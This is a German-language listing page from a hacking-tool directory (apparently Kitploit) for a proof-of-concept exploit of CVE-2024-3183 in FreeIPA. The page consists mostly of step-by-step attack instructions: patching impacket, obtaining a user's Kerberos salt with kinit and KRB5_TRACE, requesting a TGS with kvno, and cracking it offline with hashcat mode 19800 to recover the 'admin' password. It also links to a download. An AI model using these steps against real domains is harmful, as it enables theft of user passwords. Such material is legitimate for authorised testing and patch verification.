Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3183-POC — PoC für CVE-2024-3183 (FreeIPA Rosting) | Kitploit
Tools/GitHubGitHub/im10n/cve-2024-3183-poc
PasswortangriffeSchwachstellenanalyseExploitationPenetrationstestsAuthentifizierung
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

PoC für CVE-2024-3183 (FreeIPA Rosting)

Repository anzeigen
2926vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3183-POC

POC für CVE-2024-3183 (FreeIPA Rosting)

Auswirkungen: Ein Benutzer mit niedrigen Berechtigungen kann einen Hash der Passwörter aller Domänenbenutzer erhalten und einen Offline-Brute-Force-Angriff durchführen (Kerberoasting).

Patch für impacket-getTGT:

  1. Fügen Sie decoder.decode.defaultErrorState = stGetValueDecoderByTag zu impacket/krb5/kerberosv5.py hinzu.
  2. Viel Spaß!

POC1:

  1. Fügen Sie decoder.decode.defaultErrorState = stGetValueDecoderByTag zu impacket/krb5/kerberosv5.py hinzu.
  2. Sie können impacket-getTGT mit der Option -service und der Option -debug verwenden, um das Salt in einem Befehl zu erhalten. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. Zuerst fordern wir ein TGT-Ticket für einen bereits kompromittierten Benutzer "admin" an. kinit user foto1
  2. Zweitens ermitteln wir das Salt des Benutzers "admin": printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. TGS für "admin" abrufen: kvno admin foto foto3
  4. Verwenden Sie das Python-Skript (oder hashcat Mod 19800 mit spezifischem Salt) für den Brute-Force-Angriff auf das TGS foto4

1 - TGS, 2 - SALT, 3 - Passwörter.

  1. Herzlichen Glückwunsch, wir haben jetzt das Benutzerpasswort "admin".

POC3:

  1. Sie können kinit für einen einzigen Schritt verwenden: kinit -S target user

und Sie erhalten ein TGT, das mit dem Schlüssel des Zielbenutzers verschlüsselt wurde.

Tool herunterladen